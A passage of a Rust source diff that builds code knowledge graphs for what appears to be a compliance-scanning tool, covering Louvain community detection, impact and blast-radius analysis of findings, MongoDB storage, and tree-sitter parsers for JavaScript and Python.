let mut community: HashMap<NodeIndex, u32> = HashMap::new();
for idx in graph.node_indices() {
community.insert(idx, idx.index() as u32);
}
// Compute total edge weight (all edges weight 1.0)
let total_edges = graph.edge_count() as f64;
if total_edges == 0.0 {
// All nodes are isolated, each is its own community
return node_count as u32;
}
let m2 = 2.0 * total_edges;
// Pre-compute node degrees
let mut degree: HashMap<NodeIndex, f64> = HashMap::new();
for idx in graph.node_indices() {
let d = graph.edges(idx).count() as f64;
degree.insert(idx, d);
}
// Louvain phase 1: local moves
let mut improved = true;
let mut iterations = 0;
let max_iterations = 50;
while improved && iterations < max_iterations {
improved = false;
iterations += 1;
for node in graph.node_indices() {
let current_comm = community[&node];
let node_deg = degree[&node];
// Compute edges to each neighboring community
let mut comm_edges: HashMap<u32, f64> = HashMap::new();
for edge in graph.edges(node) {
let neighbor = edge.target();
let neighbor_comm = community[&neighbor];
*comm_edges.entry(neighbor_comm).or_insert(0.0) += 1.0;
}
// Also check incoming edges (undirected treatment)
for edge in graph.edges_directed(node, petgraph::Direction::Incoming) {
let neighbor = edge.source();
let neighbor_comm = community[&neighbor];
*comm_edges.entry(neighbor_comm).or_insert(0.0) += 1.0;
}
// Compute community totals (sum of degrees in each community)
let mut comm_totals: HashMap<u32, f64> = HashMap::new();
for (n, &c) in &community {
*comm_totals.entry(c).or_insert(0.0) += degree[n];
}
// Find best community
let current_total = comm_totals.get(&current_comm).copied().unwrap_or(0.0);
let edges_to_current = comm_edges.get(&current_comm).copied().unwrap_or(0.0);
// Modularity gain from removing node from current community
let remove_cost = edges_to_current - (current_total - node_deg) * node_deg / m2;
let mut best_comm = current_comm;
let mut best_gain = 0.0;
for (&candidate_comm, &edges_to_candidate) in &comm_edges {
if candidate_comm == current_comm {
continue;
}
let candidate_total = comm_totals.get(&candidate_comm).copied().unwrap_or(0.0);
// Modularity gain from adding node to candidate community
let add_gain = edges_to_candidate - candidate_total * node_deg / m2;
let gain = add_gain - remove_cost;
if gain > best_gain {
best_gain = gain;
best_comm = candidate_comm;
}
}
if best_comm != current_comm {
community.insert(node, best_comm);
improved = true;
}
}
}
// Renumber communities to be contiguous
let mut comm_remap: HashMap<u32, u32> = HashMap::new();
let mut next_id: u32 = 0;
for &c in community.values() {
if !comm_remap.contains_key(&c) {
comm_remap.insert(c, next_id);
next_id += 1;
}
}
// Apply to community map
for c in community.values_mut() {
if let Some(&new_id) = comm_remap.get(c) {
*c = new_id;
}
}
let num_communities = next_id;
info!(
communities = num_communities,
iterations, "Community detection complete"
);
// NOTE: community IDs are stored in the HashMap but need to be applied
// back to the CodeGraph nodes by the caller (engine) if needed for persistence.
// For now we return the count; the full assignment is available via the map.
num_communities
}
/// Apply community assignments back to code nodes
pub fn apply_communities(code_graph: &mut CodeGraph) -> u32 {
let count = detect_communities_with_assignment(code_graph);
count
}
/// Detect communities and write assignments into the nodes
fn detect_communities_with_assignment(code_graph: &mut CodeGraph) -> u32 {
let graph = &code_graph.graph;
let node_count = graph.node_count();
if node_count == 0 {
return 0;
}
let mut community: HashMap<NodeIndex, u32> = HashMap::new();
for idx in graph.node_indices() {
community.insert(idx, idx.index() as u32);
}
let total_edges = graph.edge_count() as f64;
if total_edges == 0.0 {
for node in &mut code_graph.nodes {
if let Some(gi) = node.graph_index {
node.community_id = Some(gi);
}
}
return node_count as u32;
}
let m2 = 2.0 * total_edges;
let mut degree: HashMap<NodeIndex, f64> = HashMap::new();
for idx in graph.node_indices() {
let d = (graph.edges(idx).count()
+ graph
.edges_directed(idx, petgraph::Direction::Incoming)
.count()) as f64;
degree.insert(idx, d);
}
let mut improved = true;
let mut iterations = 0;
let max_iterations = 50;
while improved && iterations < max_iterations {
improved = false;
iterations += 1;
for node in graph.node_indices() {
let current_comm = community[&node];
let node_deg = degree[&node];
let mut comm_edges: HashMap<u32, f64> = HashMap::new();
for edge in graph.edges(node) {
let neighbor_comm = community[&edge.target()];
*comm_edges.entry(neighbor_comm).or_insert(0.0) += 1.0;
}
for edge in graph.edges_directed(node, petgraph::Direction::Incoming) {
let neighbor_comm = community[&edge.source()];
*comm_edges.entry(neighbor_comm).or_insert(0.0) += 1.0;
}
let mut comm_totals: HashMap<u32, f64> = HashMap::new();
for (n, &c) in &community {
*comm_totals.entry(c).or_insert(0.0) += degree[n];
}
let current_total = comm_totals.get(&current_comm).copied().unwrap_or(0.0);
let edges_to_current = comm_edges.get(&current_comm).copied().unwrap_or(0.0);
let remove_cost = edges_to_current - (current_total - node_deg) * node_deg / m2;
let mut best_comm = current_comm;
let mut best_gain = 0.0;
for (&candidate_comm, &edges_to_candidate) in &comm_edges {
if candidate_comm == current_comm {
continue;
}
let candidate_total = comm_totals.get(&candidate_comm).copied().unwrap_or(0.0);
let add_gain = edges_to_candidate - candidate_total * node_deg / m2;
let gain = add_gain - remove_cost;
if gain > best_gain {
best_gain = gain;
best_comm = candidate_comm;
}
}
if best_comm != current_comm {
community.insert(node, best_comm);
improved = true;
}
}
}
// Renumber
let mut comm_remap: HashMap<u32, u32> = HashMap::new();
let mut next_id: u32 = 0;
for &c in community.values() {
if !comm_remap.contains_key(&c) {
comm_remap.insert(c, next_id);
next_id += 1;
}
}
// Apply to nodes
for node in &mut code_graph.nodes {
if let Some(gi) = node.graph_index {
let idx = NodeIndex::new(gi as usize);
if let Some(&comm) = community.get(&idx) {
let remapped = comm_remap.get(&comm).copied().unwrap_or(comm);
node.community_id = Some(remapped);
}
}
}
next_id
}

View File

@@ -0,0 +1,165 @@
use std::collections::HashMap;
use std::path::Path;
use chrono::Utc;
use compliance_core::error::CoreError;
use compliance_core::models::graph::{
CodeEdge, CodeEdgeKind, CodeNode, GraphBuildRun, GraphBuildStatus,
};
use compliance_core::traits::graph_builder::ParseOutput;
use petgraph::graph::{DiGraph, NodeIndex};
use tracing::info;
use crate::parsers::registry::ParserRegistry;
use super::community::detect_communities;
use super::impact::ImpactAnalyzer;
/// The main graph engine that builds and manages code knowledge graphs
pub struct GraphEngine {
parser_registry: ParserRegistry,
max_nodes: u32,
}
/// In-memory representation of a built code graph
pub struct CodeGraph {
pub graph: DiGraph<String, CodeEdgeKind>,
pub node_map: HashMap<String, NodeIndex>,
pub nodes: Vec<CodeNode>,
pub edges: Vec<CodeEdge>,
}
impl GraphEngine {
pub fn new(max_nodes: u32) -> Self {
Self {
parser_registry: ParserRegistry::new(),
max_nodes,
}
}
/// Build a code graph from a repository directory
pub fn build_graph(
&self,
repo_path: &Path,
repo_id: &str,
graph_build_id: &str,
) -> Result<(CodeGraph, GraphBuildRun), CoreError> {
let mut build_run = GraphBuildRun::new(repo_id.to_string());
info!(repo_id, path = %repo_path.display(), "Starting graph build");
// Phase 1: Parse all files
let parse_output = self.parser_registry.parse_directory(
repo_path,
repo_id,
graph_build_id,
self.max_nodes,
)?;
// Phase 2: Build petgraph
let code_graph = self.build_petgraph(parse_output)?;
// Phase 3: Run community detection
let community_count = detect_communities(&code_graph);
// Collect language stats
let mut languages: Vec<String> = code_graph
.nodes
.iter()
.map(|n| n.language.clone())
.collect::<std::collections::HashSet<_>>()
.into_iter()
.collect();
languages.sort();
build_run.node_count = code_graph.nodes.len() as u32;
build_run.edge_count = code_graph.edges.len() as u32;
build_run.community_count = community_count;
build_run.languages_parsed = languages;
build_run.status = GraphBuildStatus::Completed;
build_run.completed_at = Some(Utc::now());
info!(
nodes = build_run.node_count,
edges = build_run.edge_count,
communities = build_run.community_count,
"Graph build complete"
);
Ok((code_graph, build_run))
}
/// Build petgraph from parsed output, resolving edges to node indices
fn build_petgraph(&self, parse_output: ParseOutput) -> Result<CodeGraph, CoreError> {
let mut graph = DiGraph::new();
let mut node_map: HashMap<String, NodeIndex> = HashMap::new();
let mut nodes = parse_output.nodes;
// Add all nodes to the graph
for node in &mut nodes {
let idx = graph.add_node(node.qualified_name.clone());
node.graph_index = Some(idx.index() as u32);
node_map.insert(node.qualified_name.clone(), idx);
}
// Resolve and add edges
let mut resolved_edges = Vec::new();
for edge in parse_output.edges {
let source_idx = node_map.get(&edge.source);
let target_idx = self.resolve_edge_target(&edge.target, &node_map);
if let (Some(&src), Some(tgt)) = (source_idx, target_idx) {
graph.add_edge(src, tgt, edge.kind.clone());
resolved_edges.push(edge);
}
// Skip unresolved edges (cross-file, external deps) — conservative approach
}
Ok(CodeGraph {
graph,
node_map,
nodes,
edges: resolved_edges,
})
}
/// Try to resolve an edge target to a known node
fn resolve_edge_target<'a>(
&self,
target: &str,
node_map: &'a HashMap<String, NodeIndex>,
) -> Option<NodeIndex> {
// Direct match
if let Some(idx) = node_map.get(target) {
return Some(*idx);
}
// Try matching just the function/type name (intra-file resolution)
for (qualified, idx) in node_map {
// Match "foo" to "path/file.rs::foo" or "path/file.rs::Type::foo"
if qualified.ends_with(&format!("::{target}"))
|| qualified.ends_with(&format!(".{target}"))
{
return Some(*idx);
}
}
// Try matching method calls like "self.method" -> look for "::method"
if let Some(method_name) = target.strip_prefix("self.") {
for (qualified, idx) in node_map {
if qualified.ends_with(&format!("::{method_name}"))
|| qualified.ends_with(&format!(".{method_name}"))
{
return Some(*idx);
}
}
}
None
}
/// Get the impact analyzer for a built graph
pub fn impact_analyzer(code_graph: &CodeGraph) -> ImpactAnalyzer<'_> {
ImpactAnalyzer::new(code_graph)
}
}

View File

@@ -0,0 +1,219 @@
use std::collections::{HashSet, VecDeque};
use compliance_core::models::graph::ImpactAnalysis;
use petgraph::graph::NodeIndex;
use petgraph::visit::EdgeRef;
use petgraph::Direction;
use super::engine::CodeGraph;
/// Analyzes the impact/blast radius of findings within a code graph
pub struct ImpactAnalyzer<'a> {
code_graph: &'a CodeGraph,
}
impl<'a> ImpactAnalyzer<'a> {
pub fn new(code_graph: &'a CodeGraph) -> Self {
Self { code_graph }
}
/// Compute impact analysis for a finding at the given file path and line number
pub fn analyze(
&self,
repo_id: &str,
finding_id: &str,
graph_build_id: &str,
file_path: &str,
line_number: Option<u32>,
) -> ImpactAnalysis {
let mut analysis =
ImpactAnalysis::new(repo_id.to_string(), finding_id.to_string(), graph_build_id.to_string());
// Find the node containing the finding
let target_node = self.find_node_at_location(file_path, line_number);
let target_idx = match target_node {
Some(idx) => idx,
None => return analysis,
};
// BFS forward: compute blast radius (what this node affects)
let forward_reachable = self.bfs_reachable(target_idx, Direction::Outgoing);
analysis.blast_radius = forward_reachable.len() as u32;
// BFS backward: find entry points that reach this node
let backward_reachable = self.bfs_reachable(target_idx, Direction::Incoming);
// Find affected entry points
for &idx in &backward_reachable {
if let Some(node) = self.get_node_by_index(idx) {
if node.is_entry_point {
analysis
.affected_entry_points
.push(node.qualified_name.clone());
}
}
}
// Extract call chains from entry points to the target (limited depth)
for entry_name in &analysis.affected_entry_points.clone() {
if let Some(&entry_idx) = self.code_graph.node_map.get(entry_name) {
if let Some(chain) = self.find_path(entry_idx, target_idx, 10) {
analysis.call_chains.push(chain);
}
}
}
// Direct callers (incoming edges to target)
for edge in self
.code_graph
.graph
.edges_directed(target_idx, Direction::Incoming)
{
if let Some(node) = self.get_node_by_index(edge.source()) {
analysis.direct_callers.push(node.qualified_name.clone());
}
}
// Direct callees (outgoing edges from target)
for edge in self.code_graph.graph.edges(target_idx) {
if let Some(node) = self.get_node_by_index(edge.target()) {
analysis.direct_callees.push(node.qualified_name.clone());
}
}
// Affected communities
let mut affected_comms: HashSet<u32> = HashSet::new();
for &idx in forward_reachable.iter().chain(std::iter::once(&target_idx)) {
if let Some(node) = self.get_node_by_index(idx) {
if let Some(cid) = node.community_id {
affected_comms.insert(cid);
}
}
}
analysis.affected_communities = affected_comms.into_iter().collect();
analysis.affected_communities.sort();
analysis
}
/// Find the graph node at a given file/line location
fn find_node_at_location(&self, file_path: &str, line_number: Option<u32>) -> Option<NodeIndex> {
let mut best: Option<(NodeIndex, u32)> = None; // (index, line_span)
for node in &self.code_graph.nodes {
if node.file_path != file_path {
continue;
}
if let Some(line) = line_number {
if line >= node.start_line && line <= node.end_line {
let span = node.end_line - node.start_line;
// Prefer the narrowest containing node
if best.is_none() || span < best.as_ref().map(|b| b.1).unwrap_or(u32::MAX) {
if let Some(gi) = node.graph_index {
best = Some((NodeIndex::new(gi as usize), span));
}
}
}
} else {
// No line number, use file node
if node.kind == compliance_core::models::graph::CodeNodeKind::File {
if let Some(gi) = node.graph_index {
return Some(NodeIndex::new(gi as usize));
}
}
}
}
best.map(|(idx, _)| idx)
}
/// BFS to find all reachable nodes in a given direction
fn bfs_reachable(&self, start: NodeIndex, direction: Direction) -> HashSet<NodeIndex> {
let mut visited = HashSet::new();
let mut queue = VecDeque::new();
queue.push_back(start);
while let Some(current) = queue.pop_front() {
if !visited.insert(current) {
continue;
}
let neighbors: Vec<NodeIndex> = match direction {
Direction::Outgoing => self
.code_graph
.graph
.edges(current)
.map(|e| e.target())
.collect(),
Direction::Incoming => self
.code_graph
.graph
.edges_directed(current, Direction::Incoming)
.map(|e| e.source())
.collect(),
};
for neighbor in neighbors {
if !visited.contains(&neighbor) {
queue.push_back(neighbor);
}
}
}
visited.remove(&start);
visited
}
/// Find a path from source to target (BFS, limited depth)
fn find_path(
&self,
from: NodeIndex,
to: NodeIndex,
max_depth: usize,
) -> Option<Vec<String>> {
let mut visited = HashSet::new();
let mut queue: VecDeque<(NodeIndex, Vec<NodeIndex>)> = VecDeque::new();
queue.push_back((from, vec![from]));
while let Some((current, path)) = queue.pop_front() {
if current == to {
return Some(
path.iter()
.filter_map(|&idx| {
self.get_node_by_index(idx)
.map(|n| n.qualified_name.clone())
})
.collect(),
);
}
if path.len() >= max_depth {
continue;
}
if !visited.insert(current) {
continue;
}
for edge in self.code_graph.graph.edges(current) {
let next = edge.target();
if !visited.contains(&next) {
let mut new_path = path.clone();
new_path.push(next);
queue.push_back((next, new_path));
}
}
}
None
}
fn get_node_by_index(&self, idx: NodeIndex) -> Option<&compliance_core::models::graph::CodeNode> {
let target_gi = idx.index() as u32;
self.code_graph
.nodes
.iter()
.find(|n| n.graph_index == Some(target_gi))
}
}

View File

@@ -0,0 +1,4 @@
pub mod community;
pub mod engine;
pub mod impact;
pub mod persistence;

View File

@@ -0,0 +1,255 @@
use compliance_core::error::CoreError;
use compliance_core::models::graph::{CodeEdge, CodeNode, GraphBuildRun, ImpactAnalysis};
use futures_util::TryStreamExt;
use mongodb::bson::doc;
use mongodb::options::IndexOptions;
use mongodb::{Collection, Database, IndexModel};
use tracing::info;
/// MongoDB persistence layer for the code knowledge graph
pub struct GraphStore {
nodes: Collection<CodeNode>,
edges: Collection<CodeEdge>,
builds: Collection<GraphBuildRun>,
impacts: Collection<ImpactAnalysis>,
}
impl GraphStore {
pub fn new(db: &Database) -> Self {
Self {
nodes: db.collection("graph_nodes"),
edges: db.collection("graph_edges"),
builds: db.collection("graph_builds"),
impacts: db.collection("impact_analyses"),
}
}
/// Ensure indexes are created
pub async fn ensure_indexes(&self) -> Result<(), CoreError> {
// graph_nodes: compound index on (repo_id, graph_build_id)
self.nodes
.create_index(
IndexModel::builder()
.keys(doc! { "repo_id": 1, "graph_build_id": 1 })
.build(),
)
.await?;
// graph_nodes: index on qualified_name for lookups
self.nodes
.create_index(
IndexModel::builder()
.keys(doc! { "qualified_name": 1 })
.build(),
)
.await?;
// graph_edges: compound index on (repo_id, graph_build_id)
self.edges
.create_index(
IndexModel::builder()
.keys(doc! { "repo_id": 1, "graph_build_id": 1 })
.build(),
)
.await?;
// graph_builds: compound index on (repo_id, started_at DESC)
self.builds
.create_index(
IndexModel::builder()
.keys(doc! { "repo_id": 1, "started_at": -1 })
.build(),
)
.await?;
// impact_analyses: compound index on (repo_id, finding_id)
self.impacts
.create_index(
IndexModel::builder()
.keys(doc! { "repo_id": 1, "finding_id": 1 })
.options(IndexOptions::builder().unique(true).build())
.build(),
)
.await?;
Ok(())
}
/// Store a complete graph build result
pub async fn store_graph(
&self,
build_run: &GraphBuildRun,
nodes: &[CodeNode],
edges: &[CodeEdge],
) -> Result<String, CoreError> {
// Insert the build run
let result = self.builds.insert_one(build_run).await?;
let build_id = result
.inserted_id
.as_object_id()
.map(|oid| oid.to_hex())
.unwrap_or_default();
// Insert nodes in batches
if !nodes.is_empty() {
let batch_size = 1000;
for chunk in nodes.chunks(batch_size) {
self.nodes.insert_many(chunk.to_vec()).await?;
}
}
// Insert edges in batches
if !edges.is_empty() {
let batch_size = 1000;
for chunk in edges.chunks(batch_size) {
self.edges.insert_many(chunk.to_vec()).await?;
}
}
info!(
build_id = %build_id,
nodes = nodes.len(),
edges = edges.len(),
"Graph stored to MongoDB"
);
Ok(build_id)
}
/// Delete previous graph data for a repo before storing new graph
pub async fn delete_repo_graph(&self, repo_id: &str) -> Result<(), CoreError> {
let filter = doc! { "repo_id": repo_id };
self.nodes.delete_many(filter.clone()).await?;
self.edges.delete_many(filter.clone()).await?;
self.impacts.delete_many(filter).await?;
Ok(())
}
/// Store an impact analysis result
pub async fn store_impact(&self, impact: &ImpactAnalysis) -> Result<(), CoreError> {
let filter = doc! {
"repo_id": &impact.repo_id,
"finding_id": &impact.finding_id,
};
let opts = mongodb::options::ReplaceOptions::builder()
.upsert(true)
.build();
self.impacts
.replace_one(filter, impact)
.with_options(opts)
.await?;
Ok(())
}
/// Get the latest graph build for a repo
pub async fn get_latest_build(
&self,
repo_id: &str,
) -> Result<Option<GraphBuildRun>, CoreError> {
let filter = doc! { "repo_id": repo_id };
let opts = mongodb::options::FindOneOptions::builder()
.sort(doc! { "started_at": -1 })
.build();
let result = self.builds.find_one(filter).with_options(opts).await?;
Ok(result)
}
/// Get all nodes for a repo's latest graph build
pub async fn get_nodes(
&self,
repo_id: &str,
graph_build_id: &str,
) -> Result<Vec<CodeNode>, CoreError> {
let filter = doc! {
"repo_id": repo_id,
"graph_build_id": graph_build_id,
};
let cursor = self.nodes.find(filter).await?;
let nodes: Vec<CodeNode> = cursor.try_collect().await?;
Ok(nodes)
}
/// Get all edges for a repo's latest graph build
pub async fn get_edges(
&self,
repo_id: &str,
graph_build_id: &str,
) -> Result<Vec<CodeEdge>, CoreError> {
let filter = doc! {
"repo_id": repo_id,
"graph_build_id": graph_build_id,
};
let cursor = self.edges.find(filter).await?;
let edges: Vec<CodeEdge> = cursor.try_collect().await?;
Ok(edges)
}
/// Get impact analysis for a finding
pub async fn get_impact(
&self,
repo_id: &str,
finding_id: &str,
) -> Result<Option<ImpactAnalysis>, CoreError> {
let filter = doc! {
"repo_id": repo_id,
"finding_id": finding_id,
};
let result = self.impacts.find_one(filter).await?;
Ok(result)
}
/// Get nodes grouped by community
pub async fn get_communities(
&self,
repo_id: &str,
graph_build_id: &str,
) -> Result<Vec<CommunityInfo>, CoreError> {
let filter = doc! {
"repo_id": repo_id,
"graph_build_id": graph_build_id,
};
let cursor = self.nodes.find(filter).await?;
let nodes: Vec<CodeNode> = cursor.try_collect().await?;
let mut communities: std::collections::HashMap<u32, Vec<String>> =
std::collections::HashMap::new();
for node in &nodes {
if let Some(cid) = node.community_id {
communities
.entry(cid)
.or_default()
.push(node.qualified_name.clone());
}
}
let mut result: Vec<CommunityInfo> = communities
.into_iter()
.map(|(id, members)| CommunityInfo {
community_id: id,
member_count: members.len() as u32,
members,
})
.collect();
result.sort_by_key(|c| c.community_id);
Ok(result)
}
}
#[derive(Debug, Clone, serde::Serialize, serde::Deserialize)]
pub struct CommunityInfo {
pub community_id: u32,
pub member_count: u32,
pub members: Vec<String>,
}

View File

@@ -0,0 +1,7 @@
pub mod graph;
pub mod parsers;
pub mod search;
pub use graph::engine::GraphEngine;
pub use parsers::registry::ParserRegistry;
pub use search::index::SymbolIndex;

View File

@@ -0,0 +1,372 @@
use std::path::Path;
use compliance_core::error::CoreError;
use compliance_core::models::graph::{CodeEdge, CodeEdgeKind, CodeNode, CodeNodeKind};
use compliance_core::traits::graph_builder::{LanguageParser, ParseOutput};
use tree_sitter::{Node, Parser};
pub struct JavaScriptParser;
impl JavaScriptParser {
pub fn new() -> Self {
Self
}
fn walk_tree(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
parent_qualified: Option<&str>,
output: &mut ParseOutput,
) {
match node.kind() {
"function_declaration" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
let is_entry = self.is_exported_function(&node, source);
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Function,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "javascript".to_string(),
community_id: None,
is_entry_point: is_entry,
graph_index: None,
});
if let Some(body) = node.child_by_field_name("body") {
self.extract_calls(
body, source, file_path, repo_id, graph_build_id, &qualified, output,
);
}
}
}
"class_declaration" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Class,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "javascript".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
// Extract superclass
if let Some(heritage) = node.child_by_field_name("superclass") {
let base_name = &source[heritage.byte_range()];
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: qualified.clone(),
target: base_name.to_string(),
kind: CodeEdgeKind::Inherits,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
if let Some(body) = node.child_by_field_name("body") {
self.walk_children(
body, source, file_path, repo_id, graph_build_id, Some(&qualified),
output,
);
}
return;
}
}
"method_definition" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Method,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "javascript".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
if let Some(body) = node.child_by_field_name("body") {
self.extract_calls(
body, source, file_path, repo_id, graph_build_id, &qualified, output,
);
}
}
}
// Arrow functions assigned to variables: const foo = () => {}
"lexical_declaration" | "variable_declaration" => {
self.extract_arrow_functions(
node, source, file_path, repo_id, graph_build_id, parent_qualified, output,
);
}
"import_statement" => {
let text = &source[node.byte_range()];
if let Some(module) = self.extract_import_source(text) {
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: parent_qualified.unwrap_or(file_path).to_string(),
target: module,
kind: CodeEdgeKind::Imports,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
}
_ => {}
}
self.walk_children(
node,
source,
file_path,
repo_id,
graph_build_id,
parent_qualified,
output,
);
}
fn walk_children(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
parent_qualified: Option<&str>,
output: &mut ParseOutput,
) {
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
self.walk_tree(
child, source, file_path, repo_id, graph_build_id, parent_qualified, output,
);
}
}
fn extract_calls(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
caller_qualified: &str,
output: &mut ParseOutput,
) {
if node.kind() == "call_expression" {
if let Some(func_node) = node.child_by_field_name("function") {
let callee = &source[func_node.byte_range()];
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: caller_qualified.to_string(),
target: callee.to_string(),
kind: CodeEdgeKind::Calls,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
}
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
self.extract_calls(
child, source, file_path, repo_id, graph_build_id, caller_qualified, output,
);
}
}
fn extract_arrow_functions(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
parent_qualified: Option<&str>,
output: &mut ParseOutput,
) {
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
if child.kind() == "variable_declarator" {
let name_node = child.child_by_field_name("name");
let value_node = child.child_by_field_name("value");
if let (Some(name_n), Some(value_n)) = (name_node, value_node) {
if value_n.kind() == "arrow_function" || value_n.kind() == "function" {
let name = &source[name_n.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Function,
file_path: file_path.to_string(),
start_line: child.start_position().row as u32 + 1,
end_line: child.end_position().row as u32 + 1,
language: "javascript".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
if let Some(body) = value_n.child_by_field_name("body") {
self.extract_calls(
body, source, file_path, repo_id, graph_build_id, &qualified,
output,
);
}
}
}
}
}
}
fn is_exported_function(&self, node: &Node<'_>, source: &str) -> bool {
if let Some(parent) = node.parent() {
if parent.kind() == "export_statement" {
return true;
}
}
// Check for module.exports patterns
if let Some(prev) = node.prev_sibling() {
let text = &source[prev.byte_range()];
if text.contains("module.exports") || text.contains("exports.") {
return true;
}
}
false
}
fn extract_import_source(&self, import_text: &str) -> Option<String> {
// import ... from 'module' or import 'module'
let from_idx = import_text.find("from ");
let start = if let Some(idx) = from_idx {
idx + 5
} else {
import_text.find("import ")? + 7
};
let rest = &import_text[start..];
let module = rest
.trim()
.trim_matches(|c| c == '\'' || c == '"' || c == ';' || c == ' ');
if module.is_empty() {
None
} else {
Some(module.to_string())
}
}
}
impl LanguageParser for JavaScriptParser {
fn language(&self) -> &str {
"javascript"
}
fn extensions(&self) -> &[&str] {
&["js", "jsx", "mjs", "cjs"]
}
fn parse_file(
&self,
file_path: &Path,
source: &str,
repo_id: &str,
graph_build_id: &str,
) -> Result<ParseOutput, CoreError> {
let mut parser = Parser::new();
let language = tree_sitter_javascript::LANGUAGE;
parser
.set_language(&language.into())
.map_err(|e| CoreError::Graph(format!("Failed to set JavaScript language: {e}")))?;
let tree = parser
.parse(source, None)
.ok_or_else(|| CoreError::Graph("Failed to parse JavaScript file".to_string()))?;
let file_path_str = file_path.to_string_lossy().to_string();
let mut output = ParseOutput::default();
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: file_path_str.clone(),
name: file_path
.file_name()
.map(|n| n.to_string_lossy().to_string())
.unwrap_or_default(),
kind: CodeNodeKind::File,
file_path: file_path_str.clone(),
start_line: 1,
end_line: source.lines().count() as u32,
language: "javascript".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
self.walk_tree(
tree.root_node(),
source,
&file_path_str,
repo_id,
graph_build_id,
None,
&mut output,
);
Ok(output)
}
}

View File

@@ -0,0 +1,5 @@
pub mod javascript;
pub mod python;
pub mod registry;
pub mod rust_parser;
pub mod typescript;

View File

@@ -0,0 +1,336 @@
use std::path::Path;
use compliance_core::error::CoreError;
use compliance_core::models::graph::{CodeEdge, CodeEdgeKind, CodeNode, CodeNodeKind};
use compliance_core::traits::graph_builder::{LanguageParser, ParseOutput};
use tree_sitter::{Node, Parser};
pub struct PythonParser;
impl PythonParser {
pub fn new() -> Self {
Self
}
fn walk_tree(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
parent_qualified: Option<&str>,
output: &mut ParseOutput,
) {
match node.kind() {
"function_definition" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
let is_method = parent_qualified
.map(|p| p.contains("class"))
.unwrap_or(false);
let kind = if is_method {
CodeNodeKind::Method
} else {
CodeNodeKind::Function
};
let is_entry = name == "__main__"
|| name == "main"
|| self.has_decorator(&node, source, "app.route")
|| self.has_decorator(&node, source, "app.get")
|| self.has_decorator(&node, source, "app.post");
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "python".to_string(),
community_id: None,
is_entry_point: is_entry,
graph_index: None,
});
// Extract calls in function body
if let Some(body) = node.child_by_field_name("body") {
self.extract_calls(
body,
source,
file_path,
repo_id,
graph_build_id,
&qualified,
output,
);
}
}
}
"class_definition" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Class,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "python".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
